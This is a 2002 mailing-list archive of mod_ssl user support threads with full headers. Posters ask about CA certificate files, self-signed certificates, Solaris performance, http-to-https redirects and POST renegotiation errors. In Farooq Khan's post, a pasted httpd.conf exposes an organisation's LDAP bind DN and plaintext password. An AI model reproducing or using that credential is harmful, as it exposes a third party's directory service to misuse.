------=_NextPart_000_00C4_01C1D99D.A2C273B0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 1 20:44:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA08817; Mon, 1 Apr 2002 20:43:26 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from iaweb02.ifmc.org id UAA08728; Mon, 1 Apr 2002 20:42:24 +0200 (MET DST) Received: from GW5DOM2-Message_Server by iaweb02.ifmc.org with Novell_GroupWise; Mon, 01 Apr 2002 12:42:18 -0600 Message-Id: X-Mailer: Novell GroupWise 5.5.2 Date: Mon, 01 Apr 2002 12:42:09 -0600 From: "Mary Peterson" To: Subject: Multiple CA's in SSLCACertificatePath or SSLCACertificateFile Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-7 Content-Disposition: inline Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA08785 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mary Peterson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Could someone please help me configure the SSLCACertificatePath or SSLCACertificateFile to allow client certificates from multiple CA's. I have tried combining both PEM formatted CA files into one SSLCACertificateFile, but it will only read the first ¯------Begin Certificate----- ¯------End Certificate------ and not the second one. Is there something else that needs to be added to the file? I have also tried to use the SSLCACertificatePath and added both CA files to a directory which includes the Makefile file, but I have no idea what to do with the Makefile file. All documentation says you have to create symbolic links named hash-value.N, and you should always make sure this directory contains the appropriate symbolic links. Use the Makefile which comes with mod_ssl to accomplish this task. I have no clue what to do with this file or making hash symbolic links ??? Could someone please guide me in one direction or another to accomplish this task??? Thank you! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 1 21:13:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA10528; Mon, 1 Apr 2002 21:12:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail12.speakeasy.net id VAA10467; Mon, 1 Apr 2002 21:11:04 +0200 (MET DST) Received: (qmail 17463 invoked from network); 1 Apr 2002 19:11:00 -0000 Received: from unknown (HELO bio2) ([64.24.210.90]) (envelope-sender ) by mail12.speakeasy.net (qmail-ldap-1.03) with SMTP for ; 1 Apr 2002 19:11:00 -0000 Message-ID: <009201c1d9b1$4daff320$5ad21840@bio2> From: "Frank Reichenbacher" To: Subject: No CRL = Frontpage failure Date: Mon, 1 Apr 2002 12:13:25 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Frank Reichenbacher" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Apache 1.3.23, mod_ssl 2.8.7, fp extensions 5.0 I have several virtual servers on port 80 and one secure server on port 443. Frontpage will open and allow editing of the port 80 severs, but not the secure server. Since I'm just in development mode right now I haven't purchased a real certificate, nor do I want to until I've got the shopping cart ready to run. It's a matter of expense. I set up a fake TYPE=custom certificate, but when I try to open the server using Frontpage on my Windows machine it says it doesn't trust the certiciate, I should install it and try again. I tried to install using IE on the same machine and it won't because it can't verify the CRL. Is there a way around this so I don't have to purchase a certificate for just developing the site? (I'm not going back to notepad for site development) Frank ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 1 22:33:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA13998; Mon, 1 Apr 2002 22:32:31 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rock.tumko.org id WAA13954; Mon, 1 Apr 2002 22:31:43 +0200 (MET DST) Received: from rock.tumko.org (rock.tumko.org [127.0.0.1]) by rock.tumko.org (8.12.2/8.12.2) with ESMTP id g31KVfMQ001501 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Mon, 1 Apr 2002 12:31:41 -0800 Received: (from ded_subs@localhost) by rock.tumko.org (8.12.2/8.12.2/Submit) id g31KVfaC001500 for modssl-users@modssl.org; Mon, 1 Apr 2002 12:31:41 -0800 Date: Mon, 1 Apr 2002 12:31:41 -0800 From: Alex To: modssl-users@modssl.org Subject: Re: Performance Issue Message-ID: <20020401123141.A822@tumko.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Alex X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Denis, I am experiencing exactly the same issue after upgrade of couple of servers in our web-farm from Sol.2.6 to Solaris 8 (running on Sun Enterprise). We are using Apache 1.3.9 on Solaris 2.6, Apache 1.3.23/mod_ssl 2.8.7 on Solaris 8. So far I haven't figured out why it is so, currently working on this.. server-status?auto on apache 1.3.9 on Sol.2.6 returns CPU load around 1, on apache 1.3.23 on Sol.8 - from 5 to 30.... Per /server-status, Apache is taking more system CPU time: - solaris 2.6, apache 1.3.9 CPU Usage: u13.95 s4.2 cu240.96 cs66.49 - .872% CPU load - solaris 8, apache 1.3.23 CPU Usage: u13.81 s24.17 cu318.42 cs71.53 - 4.67% CPU load The servers have the same hardware, are behind load balancer, taking and processing the same number of requests. Please, let me know if you find something that explains such a high load and a way to eliminate it. Thanks, Alex In article <1017331547.410.8.camel@blue0x> you wrote: > Hey there, > I have a few webservers using apache+mod_ssl in our site. > I have noticed, with the installation of 1.3.2[34] and mod_ssl2.8.[78], > a significant performance situation. Now I have a very high load > average, which I never had before with older versions of the software > (ex: apache1.3.22+mod_ssl 2.8.6). > The hardware used are all Sun Enterprise with Solaris 2.7. > I searched through this list and couldn't find anyone with the same > problem.... no one have those problems also? > Thanks in advance. > -- > Denis A.V.Jr. - denao@uol.com.br ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 1 22:55:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA15081; Mon, 1 Apr 2002 22:54:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id WAA15059; Mon, 1 Apr 2002 22:53:22 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g31KmJw23241; Mon, 1 Apr 2002 15:48:19 -0500 Date: Mon, 1 Apr 2002 15:48:19 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: Alex cc: modssl-users@modssl.org Subject: Re: Performance Issue In-Reply-To: <20020401123141.A822@tumko.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 1 Apr 2002, Alex wrote: > I am experiencing exactly the same issue after upgrade of couple of > servers in our web-farm from Sol.2.6 to Solaris 8 (running on Sun Enterprise). > We are using Apache 1.3.9 on Solaris 2.6, Apache 1.3.23/mod_ssl 2.8.7 on > Solaris 8. > > Please, let me know if you find something that explains such a high load > and a way to eliminate it. As I mentioned the last time (and never got a response): To help track this down, can you do a before-and-after run of the following: truss -c lockstat -CP sleep 5 and email the outputs of both from the old version and the new version to me? Thanks, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 07:13:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA08906; Tue, 2 Apr 2002 07:12:05 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id HAA08883; Tue, 2 Apr 2002 07:11:28 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 6EFAD4CE618; Tue, 2 Apr 2002 07:11:27 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g325AYE91262; Tue, 2 Apr 2002 07:10:34 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.BNFUSA.com id SAA02199; Mon, 1 Apr 2002 18:15:09 +0200 (MET DST) Message-id: Date: Mon, 01 Apr 2002 10:03:54 -0600 Subject: certificate installation To: modssl-users@modssl.org From: "mailing list" MIME-Version: 1.0 Content-type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "mailing list" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I am new to mod_ssl and apache so please excuse any ignorance. My server is working fine under PORT 80. I have added a secure certificate from verisign and I am running into a few problems. I am receiving an error while trying to access my index.php page. SECURITY FAILURE. DATA DECRYPTION ERROR. I have encrypted the private.key file per the instructions from verisign. Any suggestions? Regards Adrian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 10:15:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA16733; Tue, 2 Apr 2002 10:14:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA16702; Tue, 2 Apr 2002 10:13:38 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA12456 for ; Tue, 2 Apr 2002 10:13:32 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma012449; Tue, 2 Apr 02 10:13:25 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA01124 for ; Tue, 2 Apr 2002 10:13:24 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA02899 for ; Tue, 2 Apr 2002 10:13:22 +0200 (MEST) Message-ID: <3CA96822.F70B7AAA@bourse.ch> Date: Tue, 02 Apr 2002 10:13:22 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Using https without certificates References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Bruce Smith wrote: > > Can anyone out there explain how (/whether ?) I can configure mod_ssl > so that I can use https for encryption without needing to use > certificates ? SSL can't work without a certificate since the certificate contains the public key of the server which is used to establish the encrypted communications. However, you don't need to buy a third-party certificate. You can make a self-signed certificate as described in: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 12:26:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA24091; Tue, 2 Apr 2002 12:25:25 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from echo.fssc.co.uk id MAA24060; Tue, 2 Apr 2002 12:24:19 +0200 (MET DST) Received: from hermes.nt.fssc.co.uk (hermes.nt.fssc.co.uk) by echo.fssc.co.uk (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Tue, 2 Apr 2002 11:32:59 +0100 content-class: urn:content-classes:message Subject: http redirects to https Date: Tue, 2 Apr 2002 11:23:52 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Message-ID: X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Thread-Topic: http redirects to https Thread-Index: AcG4YEBysL3p+xURQAyGW37gAvbZBwhz9Siw From: "Farooq Khan" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id MAA24087 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Farooq Khan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All, I need some help with the Mod_Rewrite module. I need to redirect all http calls to https for a specific hostname only. The httpd.conf file is something like: DocumentRoot /docs/A ... DocumentRoot /docs/B ... DocumentRoot /docs/C ... AllowOverride None AuthName "D.com" AuthType Basic AuthLDAPAuthoritative on AuthLDAPBindDN sso-query@dir.fssc.co.uk AuthLDAPBindPassword SS0-query Order deny,allow deny from all allow from all Satisfy all ServerName D.com Redirect / https://D.com/ ServerName D.com DocumentRoot /docs/D SSL stuff EOF The above works fine for redirecting http://D.com/docs/D ---> https://D.com/docs/D I want to extend it so: I want to allow some directories such as /docs/A, /docs/B, /docs/C simple http access. These are enabled by the VirtualHosts A.com, B.com, C.com. All other directories I want to be made available only via https. Original call Redirected call http://D.com/docs/D ---> https://D.com/docs/D http://D.com/ZZZ ---> https://D.com/ZZZ http://A.com/docs/D ---> rejected Any help appreciated. Thanks. Farooq Khan ----------------------------------------------------------------- This message is for the designated recipient only and may contain privileged or confidential information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 20:07:37 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28612; Tue, 2 Apr 2002 19:56:51 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA28435; Tue, 2 Apr 2002 19:55:05 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 438E94CE756; Tue, 2 Apr 2002 19:55:03 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g32HLX709914; Tue, 2 Apr 2002 19:21:33 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from di.unito.it id RAA12337; Tue, 2 Apr 2002 17:50:49 +0200 (MET DST) Message-ID: <3CA9D335.4CF70FA6@di.unito.it> Date: Tue, 02 Apr 2002 17:50:14 +0200 From: Rabellino Sergio Organization: Dipartimento di Informatica di Torino X-Mailer: Mozilla 4.79 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Bug appear after an upgrade... Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-AntiVirus: Scanned for viruses by VirusFinder @2001-tecnici@di.unito.it - Email Clean Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rabellino Sergio X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear list, I've an apache server with mod_ssl and today i've done a "regular" upgrade to my web, installing the latest apache (1.3.24) with the relative mod_ssl with openssl 0.9.6c/mm 1.1.3. After the restart of the server, almost all the thing are fine except for the client authentication with certificate, but only if I request a directory listing or a directory index. In effect if I request 1) https://myweb.com/pages/index.html I receive the correct page, but if I request 2) https://myweb.com/pages/ I receive an "403 / Access forbidden" Note that I've in effect an .htaccess that restrict the access for the whole directory, and removing the .htaccess, I can see the index.html also with the second request, so it seems not the DirectoryIndex directive in error, nor the Indexes in the Directory item. If I use a simple basic authentication (login/password) as usual, I can see all without problems, and either login:passwd and certificate:"password" lives in the same dbm file. Any hints ??? Pls. reply also to my address, as I'm not in this list... thanks. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 20:09:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28626; Tue, 2 Apr 2002 19:56:55 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA28440; Tue, 2 Apr 2002 19:55:05 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id A78AC4CE75E; Tue, 2 Apr 2002 19:55:03 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g32HKrP09888; Tue, 2 Apr 2002 19:20:53 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.designlinks.net id LAA19243; Tue, 2 Apr 2002 11:07:47 +0200 (MET DST) Received: from ayakub (host213-123-50-163.in-addr.btopenworld.com [213.123.50.163]) by ns.designlinks.net (8.10.2/8.10.2) with SMTP id g329HWc16885 for ; Tue, 2 Apr 2002 10:17:32 +0100 Received: by localhost with Microsoft MAPI; Tue, 2 Apr 2002 10:10:16 +0100 Message-ID: <01C1DA2E.965FDC20.shiraz.esat@designlinks.net> From: Shiraz Esat To: "'modssl-users@modssl.org'" Subject: RE: SSL cache issue Date: Tue, 2 Apr 2002 10:10:15 +0100 X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiraz Esat X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 20:09:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28680; Tue, 2 Apr 2002 19:57:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA28446; Tue, 2 Apr 2002 19:55:09 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id C1C4C4CE75F; Tue, 2 Apr 2002 19:55:03 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g32HL1e09894; Tue, 2 Apr 2002 19:21:01 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from somma.unipv.it id MAA21704; Tue, 2 Apr 2002 12:02:43 +0200 (MET DST) Received: from m2dm7 (m2dm7.unipv.it [193.204.34.241]) by somma.unipv.it (8.11.3/8.11.3) with SMTP id g329x0L30024 for ; Tue, 2 Apr 2002 10:59:00 +0100 Message-ID: <005e01c1da2e$43cc0740$f122ccc1@m2dm7> From: "Marco Arcelloni" To: Subject: Error reading data from client Date: Tue, 2 Apr 2002 12:07:58 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_005B_01C1DA3F.07303840" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Marco Arcelloni" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_005B_01C1DA3F.07303840 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I often encounter this error : "Error reading data from client" (on a HTTPS connection). I think I must modify the file ApacheModuleSSL.dll=20 but I want to know how. Thank you. -------------------------------------------------------------------------= ----------------------- Marco Arcelloni Consorzio di Bioingegneria e Informatica Medica arce@aim.unipv.it -------------------------------------------------------------------------= ----------------------- ------=_NextPart_000_005B_01C1DA3F.07303840 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I often encounter this = error : "Error=20 reading data from client"
(on a HTTPS=20 connection).
I think I must modify the = file=20 ApacheModuleSSL.dll
but I want to know = how.
Thank you.
 
----------------------------------------------------------------= --------------------------------
 
Marco = Arcelloni
 
Consorzio di Bioingegneria = e=20 Informatica Medica
 
arce@aim.unipv.it
 
----------------------------------------------------------------= --------------------------------
------=_NextPart_000_005B_01C1DA3F.07303840-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 22:54:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA17290; Tue, 2 Apr 2002 22:54:04 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id WAA17196; Tue, 2 Apr 2002 22:53:05 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 2 Apr 2002 12:52:54 -0800 Received: from 156.153.255.236 by lw11fd.law11.hotmail.msn.com with HTTP; Tue, 02 Apr 2002 20:52:54 GMT X-Originating-IP: [156.153.255.236] From: "Edward Wong" To: modssl-users@modssl.org Subject: RE: SSL cache issue Date: Tue, 02 Apr 2002 12:52:54 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 02 Apr 2002 20:52:54.0432 (UTC) FILETIME=[5C6FC200:01C1DA88] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is related, and might be work noting: With modSSL 3.x in apache 2.x land, I have found that it cannot renegotiate during a POST. However, hitting the refresh button seems to do the handshake and then to the POST correctly. --Ed >From: Shiraz Esat >Reply-To: modssl-users@modssl.org >To: "'modssl-users@modssl.org'" >Subject: RE: SSL cache issue >Date: Tue, 2 Apr 2002 10:10:15 +0100 > >Terry, > >If anyone passes you a solution, can you please pass it on to me as well, >as I have the same problem :( > >[Only difference, though, is that I'm using PHP generated pages] > >Thanks in advance >Shiraz > >-----Original Message----- >From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] >Sent: Friday, March 29, 2002 9:31 PM >To: 'modssl-users@modssl.org' >Subject: SSL cache issue > >I am getting 'page not found errors' the first time I access certain JSP >pages (though there are others that always work). If I refresh the page >displays correctly. > >Notes: >1. This only happens over HTTPS, never over HTTP >2. Netscape (v 4.2) displayed the error "Data Missing. This document >resulted from a POST operation and has expired from the cache. If you wish >you can repost the form data to create the document by pressing the reload >button." >3. Apache's access.log seems to validate point 2. The last line before >an error is a POST. The retry shows a POST followed shortly by anther GET >and POST of the same JSP. >4. I have not yet been able to exactly describe 'First time'. General >rule of them, if I repeat the process within 15 minutes it seems OK. If I >wait an hour it should fail. Though quantifying that has not been my >highest priority. >5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and >Resin 1.2.8. > >Any help would be appreciated. > >Terry Ziemniak > > << File: ATT00002.htm >> >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 23:23:41 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA18303; Tue, 2 Apr 2002 23:05:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id XAA18182; Tue, 2 Apr 2002 23:03:37 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g32L03a23523 for ; Tue, 2 Apr 2002 16:00:03 -0500 From: "Jeremy Walton" To: Subject: RE: SSL cache issue Date: Tue, 2 Apr 2002 15:59:46 -0500 Message-ID: <000001c1da89$522d9be0$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal In-Reply-To: <01C1DA2E.965FDC20.shiraz.esat@designlinks.net> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Actually I've had this problem. I may have the solution for you if you can tell me what OS your running the client from and what browser. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Shiraz Esat Sent: Tuesday, April 02, 2002 4:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 2 23:39:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA21417; Tue, 2 Apr 2002 23:37:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from portalhr2.chevron.com id XAA21216; Tue, 2 Apr 2002 23:35:29 +0200 (MET DST) Received: from hou281-wss1.chevron.com (hou281-wss1.chevron.com [146.22.218.8] (may be forged)) by portalhr2.chevron.com (8.11.6/8.11.6) with SMTP id g32KMjs00050 for ; Tue, 2 Apr 2002 14:22:45 -0600 (CST) Received: from 146.22.111.205 by hou281-wss1.chevron.com with ESMTP ( ChevronTexaco Mail (MMS v4.7)); Tue, 02 Apr 2002 14:22:44 -0600 X-Server-Uuid: 26fe3e76-19dd-11d3-be09-0008c7b1f151 Received: by hou281-msxb2.chevron.com with Internet Mail Service ( 5.5.2650.21) id ; Tue, 2 Apr 2002 14:22:44 -0600 Message-ID: 